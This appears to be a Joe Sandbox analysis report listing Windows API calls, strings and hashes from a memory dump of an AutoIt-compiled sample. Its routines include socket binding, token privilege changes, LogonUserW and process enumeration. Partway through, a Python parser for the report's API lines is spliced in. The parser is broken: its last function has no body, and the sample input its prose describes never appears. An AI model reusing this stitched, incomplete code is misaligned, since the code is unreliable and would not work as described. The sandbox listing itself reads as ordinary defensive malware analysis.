Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 1300846289-0
• Opcode ID: d63e5867a533ad2f295fe9594841347dbb7b078020e883eeea38bb43cfa57240
• Instruction ID: 2988a2629af7935f2c007bc1ca141362c9e1a87ce4eb7b61d8a778f07323f06e
• Opcode Fuzzy Hash: d63e5867a533ad2f295fe9594841347dbb7b078020e883eeea38bb43cfa57240
• Instruction Fuzzy Hash: C902CE70A00209DFDF04DF69D981AAEBBB5FF45300F148469E80AEB395EB75D990CB91
APIs
• DefDlgProcW.USER32(?,?), ref: 008919FA
  • Part of subcall function 00891290: DefDlgProcW.USER32(?,00000020,?), ref: 008912D8
• GetSysColor.USER32(0000000F), ref: 00891A4E
• SetBkColor.GDI32(?,00000000), ref: 00891A61
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: ColorProc
• String ID:
• API String ID: 2497529308-0
• Opcode ID: a34ca322514000ca918e6e5fd03190e276e153613734aeca91626323b6d276e3
• Instruction ID: 5475ed8cd54e18c8c95650ecdb48d48ab2741171c526c59f852a53a86bd1c280
• Opcode Fuzzy Hash: a34ca322514000ca918e6e5fd03190e276e153613734aeca91626323b6d276e3
• Instruction Fuzzy Hash: 377158A121F86EB9ED3476294C4DFBF189DFB82789F5C011DF103D5582DA25CD0192B6
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 008FBCE6
• _wcscmp.LIBCMT ref: 008FBD16
• _wcscmp.LIBCMT ref: 008FBD2B
• FindNextFileW.KERNEL32(00000000,?), ref: 008FBD3C
• FindClose.KERNEL32(00000000,00000001,00000000), ref: 008FBD6C
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: Find$File_wcscmp$CloseFirstNext
• String ID:
• API String ID: 2387731787-0
• Opcode ID: a2b63a3f356c426d4fe980de0eb7607406dd5ca3581f9e1d64c13584c3625d48
• Instruction ID: d21dd28c69f246db263d496cabf5fd8c985a0e91b82b704096e025c55568801e
• Opcode Fuzzy Hash: a2b63a3f356c426d4fe980de0eb7607406dd5ca3581f9e1d64c13584c3625d48
• Instruction Fuzzy Hash: 7E516D3560460A9FDB14EF68C491EAAB3E4FF49324F14462DEA56C73A1DB30ED04CB92
APIs
  • Part of subcall function 00907D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00907DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0090679E
• WSAGetLastError.WSOCK32(00000000), ref: 009067C7
• bind.WSOCK32(00000000,?,00000010), ref: 00906800
• WSAGetLastError.WSOCK32(00000000), ref: 0090680D
• closesocket.WSOCK32(00000000,00000000), ref: 00906821
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
• Opcode ID: 271293d8960dd199be622da95876236fa8c7b76377e6dfa771ed7ac8a35e72c5
• Instruction ID: ed3febb06ff7df1fbb00c3a2e9c669dfb93bbd3af7114af0122220f13161be47
• Opcode Fuzzy Hash: 271293d8960dd199be622da95876236fa8c7b76377e6dfa771ed7ac8a35e72c5
• Instruction Fuzzy Hash: DD417175A00214AFDF50BF6C8C86F6E77A8EB45714F08846CF959EB2D2DA749D008792
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008E80C0
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008E80CA
• GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008E80D9
• HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008E80E0
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008E80F6
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
• Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
Similarity
• API ID: HeapInformationToken$AllocErrorLastProcess
• String ID:
• API String ID: 44706859-0
• Opcode ID: 59a68cf346b75aca9c0bab4a4248efef54039ab555b4137327bdb4fb5588c70b
• Instruction ID: 6e304b2a4f72d8d5253a66d37c647431b3046e0a1363fe28a6f6bf2a079fe4d2
• Opcode Fuzzy Hash: 59a68cf346b75aca9c0bab4a4248efef54039ab555b4137327bdb4fb5588c70b
• Instruction Fuzzy Hash: ACF0C270358208FFEB104FA5EC8CEAB3BACFF4B754B404029F909C2160CB609D02EA60
                                                                        APIs
                                                                        • CoInitialize.OLE32(00000000), ref: 008FC432
                                                                        • CoCreateInstance.OLE32(00922D6C,00000000,00000001,00922BDC,?), ref: 008FC44A
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • CoUninitialize.OLE32 ref: 008FC6B7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                        • String ID: .lnk
                                                                        • API String ID: 2683427295-24824748
                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00894AD0,?,00000000), ref: 00894B45
                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00894B57
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                        • API String ID: 2574300362-192647395
                                                                        Similarity
                                                                        • API ID: __itow
                                                                        • String ID:
                                                                        • API String ID: 3482036329-0
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 0090EE3D
                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0090EE4B
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 0090EF0B
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0090EF1A
                                                                        Similarity
                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                        • String ID:
                                                                        • API String ID: 2576544623-0
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID:
                                                                        • API String ID: 3964851224-0
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008EE628
                                                                        Similarity
                                                                        • API ID: lstrlen
                                                                        • String ID: ($|
                                                                        • API String ID: 1659193697-1631851259
                                                                        APIs
                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0090180A,00000000), ref: 009023E1
                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00902418
                                                                        Similarity
                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                        • String ID:
                                                                        • API String ID: 599397726-0
                                                                        APIs
                                                                        • SetErrorMode.KERNEL32(00000001), ref: 008FB40B
                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 008FB465
                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 008FB4B2
                                                                        Similarity
                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                        • String ID:
                                                                        • API String ID: 1682464887-0
                                                                        APIs
                                                                          • Part of subcall function 008B0DB6: std::exception::exception.LIBCMT ref: 008B0DEC
                                                                          • Part of subcall function 008B0DB6: __CxxThrowException@8.LIBCMT ref: 008B0E01
                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008E882B
                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008E8858
                                                                        • GetLastError.KERNEL32 ref: 008E8865
                                                                        Similarity
                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 1922334811-0
                                                                        APIs
                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008E8774
                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 008E878B
                                                                        • FreeSid.ADVAPI32(?), ref: 008E879B
                                                                        Similarity
                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                        • String ID:
                                                                        • API String ID: 3429775523-0
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 008FC6FB
                                                                        • FindClose.KERNEL32(00000000), ref: 008FC72B
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00909468,?,0091FB84,?), ref: 008FA097
                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00909468,?,0091FB84,?), ref: 008FA0A9
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 008E81E0
• CloseHandle.KERNEL32(?), ref: 008E81F2
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,008B8D57,?,?,?,00000001), ref: 008BA15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008BA163
Strings
• Variable must be of type 'Object'., xrefs: 008D3E62
APIs
• __time64.LIBCMT ref: 008F889B
  • Part of subcall function 008B520A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,008F8F6E,00000000,00000000,?,?,?,008F911F,?,00000000), ref: 008B5213
  • Part of subcall function 008B520A: __aulldiv.LIBCMT ref: 008B5233
APIs
• mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008F4C4A
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008E8389), ref: 008E87D1
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 008BA12A
                                                                        • Instruction ID: 80a59271db28ef49389228a51983b0d6eab7f97ee0788f594d4f2cb2a2c9aa15
                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                        • Instruction Fuzzy Hash: CDC184322151930ADF2D463A84780BEBAA1FEA27B135E076DD4B3CF2D5EE10D925D720
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                        • Instruction ID: 2fc8abda965921499ddd07409c2e4de8cc39f87cec3737c4d968295a181fe4bc
                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                        • Instruction Fuzzy Hash: A2C1913221519309DF2D463984381BEBBA1FEA27B139E176DD4B2CF2D5EE20D925D720
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                        • Instruction ID: 47cb0cf78295464f02cfefe31ef6bb19377cd318b43dfd7463e4bcec6f3ecd68
                                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                        • Instruction Fuzzy Hash: B541D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                        • Instruction ID: 0f75b56633fa9167441d0203c23799a50430b0a00e6ea0af400430ad5bc8f920
                                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                        • Instruction Fuzzy Hash: C1018C78A00609EFCB45DF98C5909AEF7B5FB88310F208699E819AB345D730AE41DB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                        • Instruction ID: 03dc0b85122dc3bd4d5de22ac7fcfcf477f23f0bbc5f32827f94283d296f4623
                                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                        • Instruction Fuzzy Hash: 48018078A00509EFCB45DF98C5909AEF7F5FB88310F208599E819AB345D730EE51DB81
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
APIs
• DeleteObject.GDI32(00000000), ref: 0090785B
• DeleteObject.GDI32(00000000), ref: 0090786D
• DestroyWindow.USER32 ref: 0090787B
• GetDesktopWindow.USER32 ref: 00907895
• GetWindowRect.USER32(00000000), ref: 0090789C
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009079DD
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009079ED
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907A35
• GetClientRect.USER32(00000000,?), ref: 00907A41
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00907A7B
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907A9D
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907AB0
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907ABB
• GlobalLock.KERNEL32(00000000), ref: 00907AC4
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907AD3
• GlobalUnlock.KERNEL32(00000000), ref: 00907ADC
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907AE3
• GlobalFree.KERNEL32(00000000), ref: 00907AEE
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907B00
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00922CAC,00000000), ref: 00907B16
• GlobalFree.KERNEL32(00000000), ref: 00907B26
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00907B4C
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00907B6B
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907B8D
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907D7A
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
APIs
• CharUpperBuffW.USER32(?,?,0091F910), ref: 00913627
• IsWindowVisible.USER32(?), ref: 0091364B
Similarity
• API ID: BuffCharUpperVisibleWindow
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
• API String ID: 4105515805-45149045
APIs
• SetTextColor.GDI32(?,00000000), ref: 0091A630
• GetSysColorBrush.USER32(0000000F), ref: 0091A661
• GetSysColor.USER32(0000000F), ref: 0091A66D
• SetBkColor.GDI32(?,000000FF), ref: 0091A687
• SelectObject.GDI32(?,00000000), ref: 0091A696
• InflateRect.USER32(?,000000FF,000000FF), ref: 0091A6C1
• GetSysColor.USER32(00000010), ref: 0091A6C9
• CreateSolidBrush.GDI32(00000000), ref: 0091A6D0
• FrameRect.USER32(?,?,00000000), ref: 0091A6DF
• DeleteObject.GDI32(00000000), ref: 0091A6E6
• InflateRect.USER32(?,000000FE,000000FE), ref: 0091A731
• FillRect.USER32(?,?,00000000), ref: 0091A763
• GetWindowLongW.USER32(?,000000F0), ref: 0091A78E
  • Part of subcall function 0091A8CA: GetSysColor.USER32(00000012), ref: 0091A903
  • Part of subcall function 0091A8CA: SetTextColor.GDI32(?,?), ref: 0091A907
  • Part of subcall function 0091A8CA: GetSysColorBrush.USER32(0000000F), ref: 0091A91D
  • Part of subcall function 0091A8CA: GetSysColor.USER32(0000000F), ref: 0091A928
  • Part of subcall function 0091A8CA: GetSysColor.USER32(00000011), ref: 0091A945
  • Part of subcall function 0091A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0091A953
  • Part of subcall function 0091A8CA: SelectObject.GDI32(?,00000000), ref: 0091A964
  • Part of subcall function 0091A8CA: SetBkColor.GDI32(?,00000000), ref: 0091A96D
  • Part of subcall function 0091A8CA: SelectObject.GDI32(?,?), ref: 0091A97A
  • Part of subcall function 0091A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0091A999
  • Part of subcall function 0091A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0091A9B0
  • Part of subcall function 0091A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0091A9C5
  • Part of subcall function 0091A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0091A9ED
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• String ID:
• API String ID: 3521893082-0
APIs
• DestroyWindow.USER32(00000000), ref: 009074DE
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0090759D
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 009075DB
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 009075ED
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00907633
• GetClientRect.USER32(00000000,?), ref: 0090763F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00907683
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00907692
• GetStockObject.GDI32(00000011), ref: 009076A2
• SelectObject.GDI32(00000000,00000000), ref: 009076A6
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 009076B6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 009076BF
• DeleteDC.GDI32(00000000), ref: 009076C8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009076F4
• SendMessageW.USER32(00000030,00000000,00000001), ref: 0090770B
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00907746
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0090775A
• SendMessageW.USER32(00000404,00000001,00000000), ref: 0090776B
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0090779B
• GetStockObject.GDI32(00000011), ref: 009077A6
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 009077B1
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 009077BB
                                                                        Similarity
                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                        • API String ID: 2910397461-517079104
                                                                        • Opcode ID: 710222d9bbaf076cd677e8602c11da14014063efdb0716d1d2c8c83dec47657e
                                                                        • Instruction ID: f25352ff32183ec4f7724acba99fe35c733643d0fd88487e62c16e8e96e2cef4
                                                                        • Opcode Fuzzy Hash: 710222d9bbaf076cd677e8602c11da14014063efdb0716d1d2c8c83dec47657e
                                                                        • Instruction Fuzzy Hash: 9EA17171A14619BFEB14DBA8DC5AFAE7BB9EB04711F048114FA15E72E1C670AD00DB60
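Every API line in these per-routine blocks has one fixed shape, `Function.MODULE(args), ref: address`, optionally prefixed by `Part of subcall function NNN:`, with immediates printed as eight hex digits and unresolved arguments as `?`. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that shape into records, counts calls per module and pulls out the string-typed arguments (window class names, paths, format strings) the analyzer resolved, which is usually the fastest way to tell a GUI helper from a dropper routine. The sample input is constructed from API lines copied from several routines on this page; the `ApiCall` record and the helper names are the example's own.

```python
"""Parse the per-routine "APIs" list of a Joe Sandbox report into structured records."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional, Union

Arg = Union[int, str, None]   # hex immediate, string literal, or None for an unresolved "?"

# One API line, e.g.
#   • SetTimer.USER32(00000000,00000000,00000028,Function_00001256), ref: 008929FC
#   • _memset.LIBCMT ref: 00918C44
#     • Part of subcall function 00892344: GetCursorPos.USER32(?), ref: 00892357
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")


@dataclass
class ApiCall:                        # record type defined by this example
    func: str
    module: str
    args: List[Arg]
    ref: int                          # call-site address inside the memory dump
    subcall_of: Optional[int] = None  # callee address for "Part of subcall function" lines


def _parse_arg(tok: str) -> Arg:
    tok = tok.strip()
    if tok == "?":
        return None
    # The report prints immediates as exactly 8 hex digits. A genuine 8-character
    # string made only of hex letters (e.g. "DEADBEEF") would be misread as a number.
    if HEX8.match(tok):
        return int(tok, 16)
    return tok


def parse_trace(text: str) -> List[ApiCall]:
    """Return every API line of a block in report order; headers such as 'APIs'/'Strings' are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        # Arguments are comma separated; a string argument that itself contains a comma
        # would be split in two (a limitation of the report's notation, not fixable here).
        args = [_parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(ApiCall(
            func=m.group("func"),
            module=m.group("module"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def summarize(calls: List[ApiCall]) -> Counter:
    """Calls per module (USER32, GDI32, KERNEL32, LIBCMT, ...): a quick feel for what a routine does."""
    return Counter(c.module for c in calls)


def string_args(calls: List[ApiCall]) -> List[str]:
    """Distinct string-typed arguments the analyzer resolved: window classes, paths, format strings."""
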